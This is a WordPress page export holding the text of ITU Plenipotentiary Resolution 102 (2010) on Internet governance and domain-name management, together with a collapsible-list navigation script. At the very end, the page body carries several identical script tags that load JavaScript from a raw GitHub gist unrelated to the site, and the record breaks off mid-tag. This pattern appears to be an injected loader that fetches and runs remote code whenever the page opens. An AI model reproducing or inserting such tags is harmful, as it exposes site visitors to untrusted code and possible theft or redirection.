{"id":405,"date":"2013-05-18T09:55:21","date_gmt":"2013-05-18T13:55:21","guid":{"rendered":"http:\/\/internetdistinction.com\/wsisimpacts\/?page_id=405"},"modified":"2015-06-29T23:43:51","modified_gmt":"2015-06-30T03:43:51","slug":"pp_102","status":"publish","type":"page","link":"https:\/\/internetdistinction.com\/wsisimpacts\/wsis\/plenipotentiary\/pp-2010\/pp_102\/","title":{"rendered":"PP Resolution 102"},"content":{"rendered":"<p><style type=\"text\/css\">\r\nbody {}\r\n\r\n:link { color: #0000ff; text-decoration:none;}\r\n:visited { color: #6666ff; text-decoration:none; }\r\na:active { color: #0000ff; text-decoration:none;}\r\na:hover {color: #0000ff; text-decoration:underline; }\r\n\r\ndiv.basetext {}\r\n\r\ndiv.basetop {}\r\n\r\nh1 {\r\n    text-align:center;\r\n}\r\n\r\nspan.h2 {}\r\n\r\ndiv.year {}\r\n\r\ndiv.form {}\r\n\r\nspan.cpt {}\r\n\r\nspan.cm {}\r\n\r\n.fl {}\r\n\r\nul {}\r\n\r\nli {}\r\n\r\nul li {}\r\n\r\nli.basic {}\r\n\r\nspan.links {}\r\n\r\n\r\n\r\n\r\n.sub { display: none; }\r\n.subexp {display: block; }\r\n.sub { display: none; } \r\n\r\n.subexp {display: block; } \r\n\r\nli.exp {\r\n  cursor:pointer;\r\n}\r\n\r\nli.col {\r\n  cursor:pointer;\r\n}\r\n\r\nli.exp_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\nli.col_active {\r\n  background-color:#eeeeff;\r\n  cursor:pointer;\r\n}\r\n\r\n\r\nli.basic_active {\r\n  background-color:#eeeeff;\r\n}\r\n<\/style><br \/>\n<SCRIPT language=JavaScript>\r\nfunction get_keycode(evt) {\r\n  \/\/ IE\r\n    code = document.layers ? evt.which\r\n           : document.all ? event.keyCode \/\/ event.keyCode!=evt.keyCode!\r\n           : evt.keyCode;\r\n\r\n  if (code==0) \r\n    code=evt.which; \/\/ for NS\r\n  return code;\r\n}\r\n\r\nvar lastnode=null;\r\nvar listnodes = null;\r\nvar list_index=1;\r\nvar lastnodetype=''; \/\/ determines if node is a link, input or text;\r\n\r\n\/\/ up, left, down, right, keypress codes\r\n\/\/ijkl\r\n\/\/var keys = new Array(105,106,107,108);\r\n\/\/num arrows\r\n\/\/var keys = new Array(56,52,50,54);\r\n\/\/wasd\r\n\/\/ var press2 = new Array(119,97,115,100);\r\n var press = new Array(47,45,42,43);\r\n\r\n\/\/ keydown codes\r\n  \/\/  var keys2=new Array(87,65,83,68);\r\n  var keys= new Array(38,37,40,39);\r\n\r\n  \/\/ keyset 1 = keydown, otherwise press\r\nfunction checkup(keyset,n) {\r\n  if (keyset==1) return (n==keys[0]);\r\n  return ((n==press[0]) \/*|| (n==press2[0])*\/)\r\n}\r\n\r\nfunction checkdn(keyset,n) {\r\n  if (keyset==1) return (n==keys[2]);\r\n  return ((n==press[2]) \/*|| (n==press2[2])*\/)\r\n}\r\n\r\nfunction checkl(keyset,n) {\r\n  if (keyset==1) return (n==keys[1]);\r\n  return ((n==press[1]) \/*|| (n==press2[1])*\/)\r\n}\r\n\r\nfunction checkr(keyset,n) {\r\n  if (keyset==1) return (n==keys[3]);\r\n  return ((n==press[3]) \/*|| (n==press2[3])*\/)\r\n}\r\n\r\n\r\n\r\n\r\n\r\nfunction is_exp(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='exp') || (n.className=='exp_active'));\r\n}\r\n\r\nfunction is_col(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='col') || (n.className=='col_active'));\r\n}\r\n\r\nfunction is_basic(n) {\r\n  if (n==null) return false;\r\n  return ((n.className=='basic') || (n.className=='basic_active'));\r\n}\r\n\r\n\r\n\r\n\/* returns i>=0 if true *\/\r\nfunction is_active(node) {\r\n  if (node.className==null) return false\r\n  return node.className.indexOf('_active');\r\n}\r\n\r\nfunction toggle_class(node) {\r\n  if ((node==null) || (node.className==null)) return;\r\n  str=node.className;\r\n  result=\"\";\r\n  i = str.indexOf('_active');\r\n  if (i>0)\r\n    result= str.substr(0,i);\r\n  else\r\n    result= str+\"_active\";\r\n  node.className=result; \r\n  return node;\r\n}\r\n\r\nfunction activate(node) {\r\n  node.style.backgroundColor='#eeeeff';\r\n}\r\n\r\nfunction deactivate(node) {\r\n   node.style.backgroundColor='#ffffff';\r\n}\r\n\r\nfunction is_list_node(n) {\r\n  if (n==null) return false;\r\n  if (n.className==null) return false;\r\n  if ( (is_exp(n)) || \r\n       (is_col(n)) ||\r\n       (is_basic(n)) )\r\n   return true; else return false;\r\n}\r\n\r\n\r\nfunction get_href(n) {\r\n  alist=n.attributes;\r\n  if (alist!=null) {\r\n    hr = alist.getNamedItem('href');\r\n    if (hr!=null) return hr.nodeValue;\r\n  }\r\n  if (n.childNodes.length==0) return '';\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_href(n.childNodes[i]);\r\n    if (s!='') return s;\r\n  }\r\n  return '';\r\n}\r\n\r\nfunction get_link(n) {\r\n  if (n==null) return null;\r\n  if (n.style==null) return null;\r\n\r\n \/\/ disabling uncontrolled recursion to prevent error messages on IE\r\n \/\/ when trying to focus to invisible links (readonly mode)\r\n\/\/    alert(n.nodeName+' '+n.className);\r\n  if ((n.nodeName=='UL') && (n.className=='sub')) return null;\r\n\r\n  if (n.nodeName=='A') return n;\r\n  if (n.childNodes.length==0) return null;\r\n  for (var i=0; i<n.childNodes.length; i++) {\r\n    s = get_link(n.childNodes[i]);\r\n    if (s!=null) return s;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction set_lastnode(n) {\r\n\/*var d = new Date();\r\nvar t_mil = d.getMilliseconds();*\/\r\n\/\/ testattu nopeuksia explorerilla, ei merkitt\u00e4vi\u00e4 eroja\r\n  if (lastnode==n) return; \r\n\/*  deactivate(lastnode)\r\n  lastnode=n;\r\n  activate(lastnode);*\/\r\n\r\n  if (is_active(lastnode)>=0)\r\n    toggle_class(lastnode);\r\n  lastnode=n;\r\n  if (!(is_active(lastnode)>=0))\r\n    toggle_class(lastnode);\r\n\r\n\r\n\/*var d2 = new Date();\r\nvar t_mil2 = d2.getMilliseconds();\r\n  window.alert(t_mil2-t_mil);*\/\r\n}\r\n\r\nfunction next_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex<listnodes.length-1) {\r\n    tempIndex++;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\nfunction prev_list_node() {\r\n  tempIndex = list_index;\r\n  while (tempIndex>0) {\r\n    tempIndex--;\r\n    var x = listnodes[tempIndex];\r\n    if (is_list_node(x)) {\r\n      list_index=tempIndex;\r\n      return;\r\n    }\r\n  }\r\n}\r\n\r\n\r\n\r\nfunction getsub (li) {\r\n  if (li.childNodes.length==0) return null;\r\n  for (var c = 0; c < li.childNodes.length; c++)\r\n    if ( (li.childNodes[c].className == 'sub') || (li.childNodes[c].className == 'subexp') ) \r\n      return li.childNodes[c];\r\n}\r\n\r\nfunction find_listnode_recursive (li) {\r\n  if (is_list_node(li)) return li; \r\n  if (li.childNodes.length==0) return null;\r\n  result=null;\r\n  for (var c = 0; c < li.childNodes.length; c++) {\r\n    result=find_listnode_recursive(li.childNodes[c]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;\r\n}\r\n\r\nfunction next_child_listnode(li) {\r\n  var result=null;\r\n  for (var i=0; i<li.childNodes.length; i++) {\r\n    result=find_listnode_recursive(li.childNodes[i]);\r\n    if (result!=null) return result;\r\n  }\r\n  return null;  \r\n}\r\n\r\nfunction next_actual_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction next_sibling_listnode(li) {\r\nif (li==null) return null; \r\n var result=null;\r\n  var temp=li;\r\n  if (is_col(temp)) return next_child_listnode(temp);\r\n  while (1) { \r\n    var n = temp.nextSibling;\r\n    if (n==null) {\r\n      n=parent_listnode(temp);\r\n      return next_actual_sibling_listnode(n);\r\n    }\r\n    if (is_list_node(n)) return n;\r\n    temp=n;\r\n  }\r\n}\r\n\r\nfunction last_sibling_listnode(li) {\r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var last=null;\r\n  while(1) {\r\n    var n = temp.nextSibling;\r\n    if (is_list_node(temp)) \r\n      last = temp;\r\n    if (n==null) {\r\n      if (is_col(last)) return last_sibling_listnode(next_child_listnode(last));\r\n      else return last;\r\n    }\r\n    temp = n;\r\n  }\r\n}\r\n\r\nfunction prev_sibling_listnode(li) { \r\n  if (li==null) return null;\r\n  var temp=li;\r\n  var n = null;\r\n  while (1) { \r\n    n = temp.previousSibling;\r\n    if (n==null) {\r\n      return parent_listnode(li);\r\n    }\r\n    if (is_list_node(n)) {\r\n      if (is_col(n)) { \r\n        return last_sibling_listnode(next_child_listnode(n));\r\n      }\r\n      else {\r\n        return n;\r\n      }\r\n    }\r\n    temp=n;\r\n  }\r\n}\r\n\r\n\r\nfunction parent_listnode(li) {\r\n  \/\/ added 12.7.2004 to prevent IE error when readonly mode==true\r\n  if (li==null) return null;\r\n  n=li;\r\n  while (1) {\r\n    n=n.parentNode;\r\n    if (n==null) return null;\r\n    if (is_list_node(n)) return n;\r\n  }\r\n}\r\n\r\nfunction getVisibleParents(id) {\r\n  var n = document.getElementById(id);\r\n  while(1) {\r\n    expand(n);\r\n    n = parent_listnode(n);\r\n    if (n==null) return;\r\n  }\r\n}\r\n\r\nfunction onClickHandler (evt) {\r\nif (lastnode==null) \r\n{\r\nlistnodes = document.getElementsByTagName('li');\r\nlastnode=listnodes[1];\r\ntemp=listnodes[1];\r\n}\r\n\r\n\r\n  var target = evt ? evt.target : event.srcElement;\r\n  if (!is_list_node(target)) return;\r\n  toggle(target);\r\n  set_lastnode(target);\r\n}\r\n\r\n\r\nfunction expand(node) {\r\n    if (!is_exp(node)) return;\r\n    if (node.className=='exp_active') \r\n      node.className='col_active';\r\n    else \r\n        node.className='col';\r\n    setSubClass(node,'subexp');\r\n    \/\/    getsub(node).className='subexp';\r\n}\r\n\r\nfunction collapse(node) {\r\n  if (!is_col(node)) return;\r\n  \r\nif (node.className=='col_active')\r\n    node.className='exp_active'\r\n  else \r\n    node.className='exp';\r\n\r\n setSubClass(node,'sub');\r\n\/\/  getsub(node).className='sub';\r\n\r\n}\r\n\r\nfunction setSubClass(node,name) {\r\n  sub = getsub(node);\r\n  if (sub==null) return;\r\n  sub.className=name;  \r\n}\r\n\r\nfunction toggle(target) {\r\n  if (!is_list_node(target)) return;\r\n    if (is_col(target)) {\r\n      target.className='exp';\r\n      setSubClass(target,'sub');\r\n      \/\/      getsub(target).className='sub';\r\n    }\r\n    else if (is_exp(target)) {\r\n      target.className='col';\r\n      setSubClass(target,'subexp');\r\n      \/\/      getsub(target).className='subexp';\r\n    }\r\n \r\n}\r\n\r\nfunction expandAll(node) {\r\n    if (node.className=='exp') {\r\n        node.className='col';\r\n        setSubClass(node,'subexp');\r\n\/\/        getsub(node).className='subexp';\r\n    }\r\n    var i;\r\n    if (node.childNodes!=null) \r\n\/\/    if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            expandAll(node.childNodes[i]);\r\n}\r\n\r\nfunction collapseAll(node) {\r\n    if  (node.className=='col') {\r\n        node.className='exp';\r\n        setSubClass(node,'sub');\r\n\/\/        getsub(node).className='sub';\r\n    }\r\n    var i;        \r\n    if (node.childNodes!=null) \r\n\/\/ for opera   if (node.hasChildNodes()) \r\n        for ( i = 0; i<node.childNodes.length; i++)\r\n            collapseAll(node.childNodes[i]);\r\n}\r\n\r\n\r\n\r\nfunction unFocus(node) {\r\n     \/\/ unfocuses potential link that is to be hidden (if a==null there is no link so it should not be blurred).\r\n     \/\/ tested with mozilla 1.7, 12.7.2004. \/mn (\r\n      intemp=parent_listnode(node);  \r\n      a = get_link(intemp);     \/\/ added 6.4. to get keyboard working with\r\n      \/\/ moved before collapse to prevent an error message with IE when readonly==true      \r\n      if (a!=null) a.blur(); \/\/ netscape after collapsing a focused node\r\n      return intemp;\r\n}\r\n\r\n\/\/ mode: 0==keypress, 1==keyup\r\nfunction keyfunc(evt,mode) {\r\n var c = get_keycode(evt);\r\n var temp = null;\r\n var a = null;\r\n\r\n  if (lastnode==null) {\r\n    listnodes = document.getElementsByTagName('li');\r\n    lastnode=listnodes[1];\r\n    temp=listnodes[1];\r\n  }\r\n\r\n  \/\/window.alert(c);\r\n  if (checkup(mode,c)) { \/\/ i \r\n   temp=prev_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkdn(mode,c)) { \/\/ k\r\n    temp=next_sibling_listnode(lastnode);\r\n  }\r\n  else if (checkr(mode,c)) { \/\/ l\r\n    expand(lastnode);\r\n    \/\/  temp=next_child_listnode(lastnode);\r\n    \/\/ if (temp==null) {\r\n      a = get_link(lastnode);\r\n        if (a!=null) a.focus(); else self.focus(); \r\n      \/\/}\r\n  }\r\n  else if (checkl(mode,c)) { \/\/ j\r\n    if (is_col(lastnode)) {\r\n      unFocus(lastnode);\r\n      collapse(lastnode);\r\n    }\r\n    else {\r\n      temp=unFocus(lastnode);\r\n      collapse(temp);\r\n    }\r\n   \/\/    if (temp==null) lastnode.focus(); \/\/ forces focus to correct div (try mozilla typesearch) (doesn't seem to work -mn\/6.4.2004)\r\n  }\r\n  else return;\r\n  if (temp!=null) set_lastnode(temp);\r\n\r\n  \/\/ alert('pressed ' + String.fromCharCode(c) + '(' + c + ')');\r\n  return true;\r\n}\r\n\r\n\r\nfunction keytest (evt) {\r\n  return keyfunc(evt,1);\r\n};\r\n\r\n\r\nfunction presstest (evt) {\r\n  return keyfunc(evt,0);\r\n};\r\n\r\n\r\n  document.onclick = onClickHandler;\r\n  document.onkeypress = presstest;\r\n  document.onkeyup = keytest;\r\n<\/SCRIPT><\/p>\n<h3><span style=\"\">PP RESOLUTION  102  (Rev. Guadalajara, 2010)<\/span><\/h3>\n<h4><span style=\"\">ITU&#8217;s role with regard to international public policy issues pertaining to the Internet and the management of Internet resources, including domain names and addresses<\/span><\/h4>\n<p><span style=\"\">The Plenipotentiary Conference of the International Telecommunication Union (Guadalajara, 2010),<\/span><\/p>\n<ul class=\"subexp\">\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)         all relevant resolutions of the Plenipotentiary Conference;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        all relevant outcomes of the World Summit on the Information Society (WSIS),<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">considering<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the purposes of the Union are, inter alia, to promote, at the international level, the adoption of a broad approach to the issues of telecommunications\/information and communication technologies (ICTs) in the global information economy and society, to promote the extension of the benefits of new telecommunication technologies to all the world&#8217;s inhabitants and to harmonize the efforts of Member States and Sector Members in the attainment of those ends;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that advances in the global information infrastructure, including the development of Internet Protocol (IP)-based networks and the Internet, taking into account the requirements, features and interoperability of next-generation networks (NGN) and future networks, are of crucial importance as an important engine for growth in the world economy in the twenty-first century;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that the development of the Internet is essentially market-led and driven by private and government initiatives;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that the private sector continues to play a very important role in the expansion and development of the Internet, for example through investments in infrastructures and services;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that management of the registration and allocation of Internet domain names and addresses must fully reflect the geographical nature of the Internet, taking into account an equitable balance of interests of all stakeholders;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        the role played by ITU in the successful organization of the two phases of the World Summit on the Information Society (WSIS), and that the Geneva Declaration of Principles and the Geneva Plan of Action, adopted in 2003, and the Tunis Commitment and the Tunis Agenda for the Information Society, adopted in 2005, have been endorsed by the United Nations General Assembly;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        that the management of the Internet is a subject of valid international interest and must flow from full international and multistakeholder cooperation on the basis of the outcomes of the two phases of WSIS;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        that, as stated in the WSIS outcomes, all governments should have an equal role and responsibility for international Internet governance and for ensuring the stability, security and continuity of the existing Internet and its future development and of the future internet, and that the need for development of public policy by governments in consultation with all stakeholders is also recognized,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">recognizing further<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that ITU is dealing with technical and policy issues related to IP-based networks, including the existing Internet and evolution to NGN as well as studies into the future internet;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that ITU performs worldwide coordination of a number of radiocommunication-related and telecommunication-related resource allocation systems and acts as a forum for policy discussion in this area;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that significant effort has been put in by ITU on ENUM, &#8220;.int&#8221;, internationalized domain name (IDN), and country code top-level domain (ccTLD) issues through workshops and standardization activities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that ITU has published a comprehensive and useful Handbook on Internet Protocol (IP)-based networks and related topics and Issues;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        \u00a7\u00a7 71 and 78a) of the Tunis Agenda with regard to the establishment of enhanced cooperation on Internet governance and the establishment of the Internet Governance Forum (IGF), as two distinct processes;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">f)        the relevant WSIS outcomes in \u00a7\u00a7 29-82 of the Tunis Agenda concerning Internet governance;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">g)        that ITU should be encouraged to facilitate cooperation with all stakeholders as referred to in \u00a7 35 of the Tunis Agenda;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">h)        that Member States represent the interests of the population of the country or territory for which a ccTLD has been delegated;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">i)        that countries should not be involved in decisions regarding another country&#8217;s ccTLD,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">emphasizing<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        that the management of the Internet encompasses both technical and public policy issues and should involve all stakeholders and relevant intergovernmental and international organizations in accordance with \u00a7\u00a7 35 a)-e) of the Tunis Agenda;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the role of governments includes providing a clear, consistent and predictable legal framework, in order to promote a favourable environment in which global ICT networks are interoperable with Internet networks and widely accessible to all citizens without any discrimination and to ensure adequate protection of public interests in the management of Internet resources, including domain names and addresses;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        that WSIS recognized the need for enhanced cooperation in the future, to enable governments, on an equal footing, to carry out their roles and responsibilities, in international public policy issues pertaining to the Internet, but not in the day-to-day technical and operational matters that do not impact on international public policy issues;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that ITU, for its part, has started the process towards enhanced cooperation as one of the relevant organizations referred to in \u00a7 71 of the Tunis Agenda, and that the Dedicated Group on international Internet-related public policy issues should continue its work on Internet-related public policy issues;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that ITU can play a positive role by offering all interested parties a platform for encouraging discussions and for the dissemination of information on the management of Internet domain names and addresses and other Internet resources within the mandate of ITU,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">noting<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">a)        the decision to convene the fourth World Telecommunication Policy Forum and the results of this forum, in particular Opinion 1 in regard to public policy issues pertaining to the Internet, and taking into consideration Resolutions 47, 48, 49, 50 and 52 (Rev. Johannesburg, 2008) and 64, 69 and 75 (Johannesburg, 2008) of the World Telecommunication Standardization Assembly (WTSA);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">b)        that the Dedicated Group, as an integral part of the Council Working Group on WSIS (Resolution 75 (Johannesburg, 2008)), has furthered the objectives of that resolution regarding public policy issues pertaining to the Internet;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">c)        Resolution 1305, adopted by the ITU Council at its 2009 session, which instructed the Secretary-General to disseminate, as appropriate, the reports of the Dedicated Group to all relevant international organizations and stakeholders actively involved in such matters for their consideration in their policy-making processes;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">d)        that the Dedicated Group would be more efficient in its role if it became autonomous and directly responsible to the Council;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">e)        that the Dedicated Group shall include in its work all relevant decisions of this conference and all other resolutions relevant to the work of the group as stated in Council Resolution 1305 and the annex thereto,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">resolves<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to explore ways and means for greater collaboration and coordination between ITU and relevant organizations1 involved in the development of IP-based networks and the future internet, through cooperation agreements, as appropriate, in order to increase the role of ITU in Internet governance so as to ensure maximum benefits to the global community.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites the Dedicated Group on international Internet-related public policy issues, as an integral part of the Council Working Group on the World Summit on the Information Society,<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to consider and discuss the activities of the Secretary-General and Directors of the Bureaux in relation to the implementation of this resolution;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to prepare ITU inputs into the above-mentioned activities as appropriate,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Council<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to revise its appropriate resolutions to make the Dedicated Group into a Council working group (CWG), limited to Member States, with open consultation to all stakeholders;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        taking into account annual reports presented by the Secretary-General and the Directors of the Bureaux, to take appropriate measures in order to contribute actively to international discussions and initiatives related to issues on international management of Internet domain names and addresses and other Internet resources within the mandate of ITU;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to consider the reports of Dedicated Group and take actions as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to report to the 2014 plenipotentiary conference on the activities undertaken and achievements on the objectives of this resolution, including proposals for further consideration as appropriate,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to participate in the discussions on international management of Internet resources, including domain names and addresses, and in the process towards enhanced cooperation on Internet governance and international public policy issues pertaining to the Internet, so that worldwide representation in the debates can be ensured;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to continue to participate actively in the discussions and development of public policy issues related to Internet resources, including domain names and addresses, their possible evolution and the impact of new usages and applications, cooperating with the relevant organizations, and to contribute to the Dedicated Group and ITU study groups on related matters,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">invites Member States and Sector Members<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">to seek the appropriate means to contribute to enhanced cooperation on international public policy issues relating to the Internet, in their respective roles and responsibilities.<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Secretary-General<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to continue to take a significant role in international discussions and initiatives on the management of Internet domain names and addresses and other Internet resources within the mandate of ITU, taking into account future developments of the Internet, the purposes of the Union and the interests of its membership as expressed in its instruments, resolutions and decisions;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to take the necessary steps for ITU to continue to play a facilitating role in the coordination of international public policy issues pertaining to the Internet, as expressed in \u00a735 d) of the Tunis Agenda, interacting as necessary with other intergovernmental organizations in these domains;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        in line with \u00a7 78 a) of the Tunis Agenda, to continue to contribute as appropriate to the work of IGF, should the mandate of the IGF be extended by the 2010 session of the United Nations General Assembly;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to continue to take the necessary steps for ITU to play an active and constructive role in the process towards enhanced cooperation as expressed in \u00a7 71 of the Tunis Agenda;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">5        to continue to take the necessary steps in ITU&#8217;s own internal process towards enhanced cooperation on international public policy issues pertaining to the Internet as expressed in \u00a7 71 of the Tunis Agenda, involving all stakeholders, in their respective roles and responsibilities;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">6        to report annually to the Council on the activities undertaken on these subjects and to submit proposals as appropriate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">7        to continue to disseminate, as appropriate, the reports of the Dedicated Group to all relevant international organizations and stakeholders actively involved in such matters for their consideration in their policy-making processes,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Directors of the Bureaux<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to contribute to the Dedicated Group concerning the activities undertaken by their Bureaux which are relevant to the work of the group;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to provide assistance, within the Union&#8217;s expertise, and within available resources, as appropriate, in cooperation with relevant organizations, to Member States, if so requested, in order to achieve their stated policy objectives with respect to the management of Internet domain names and addresses and other Internet resources, and with respect to Internet-related public policy issues, as stated in the annex to Council Resolution 1305, which identifies the role of the Dedicated Group, within their mandate;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to liaise and to cooperate with the regional telecommunication organizations pursuant to this resolution,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Standardization Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to ensure that the ITU Telecommunication Standardization Sector (ITU-T) performs its role in technical issues, and to continue to contribute ITU-T expertise and to liaise and cooperate with appropriate entities on issues related to the management of Internet domain names and addresses and other Internet resources within the mandate of ITU, such as IP version 6 (IPv6), ENUM and IDNs, as well as any other related technological developments and issues, including facilitating appropriate studies on these issues by relevant ITU-T study groups and other groups;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        in accordance with ITU rules and procedures, and calling upon contributions from the ITU membership, to continue to play a facilitating role in coordination and assistance in the development of public policy issues pertaining to Internet domain names and addresses and other Internet resources within the mandate of ITU and their possible evolution;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to work with Member States and Sector Members, recognizing the activities of other appropriate entities, on issues concerning Member States&#8217; ccTLDs and related experiences;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">4        to report annually to the Council, and also to WTSA, on the activities undertaken and achievements on these subjects, including proposals for further consideration as appropriate,<\/span><\/li>\n<\/ul>\n<\/li>\n<li class=\"exp\" style=\"\"><span style=\"\">instructs the Director of the Telecommunication Development Bureau<\/span>\n<ul class=\"sub\">\n<li class=\"basic\" style=\"\"><span style=\"\">1        to organize international and regional forums and carry out necessary activities, in conjunction with appropriate entities, for the period 2010-2014, to discuss policy, operational and technical issues on the Internet in general, and on the management of Internet domain names and addresses and other Internet resources within the mandate of ITU in particular, including with regard to multilingualism, for the benefit of Member States, especially for developing countries, including the least developed countries (LDCs), small island developing states (SIDS), landlocked developing countries (LLDCs) and countries with economies in transition, taking into consideration the content of the relevant resolutions of this conference, including this resolution, in addition to the content of the relevant resolutions of the 2010 world telecommunication development conference (WTDC);<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">2        to continue promoting, through the ITU Telecommunication Development Sector programmes and study groups, the exchange of information, fostering debate and the development of best practices on Internet issues, and to continue to play a key role in outreach by contributing to capacity building, providing technical assistance and encouraging the involvement of developing countries, including LDCs, SIDS, LLDCs and countries with economies in transition, in international Internet forums and issues;<\/span><\/li>\n<li class=\"basic\" style=\"\"><span style=\"\">3        to continue reporting annually to the Council and the Telecommunication Development Advisory Group, and also to WTDC, on the activities undertaken and achievements on these subjects, including proposals for further consideration as appropriate,<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' src='https:\/\/gist.githubusercontent.com\/vladimir677\/bd66b2780ce8792e731469b660a62590\/raw\/3a71aff685732599ba7fbadf7b929eae8d19053a\/js.js'><\/script> <script type='text\/javascript' 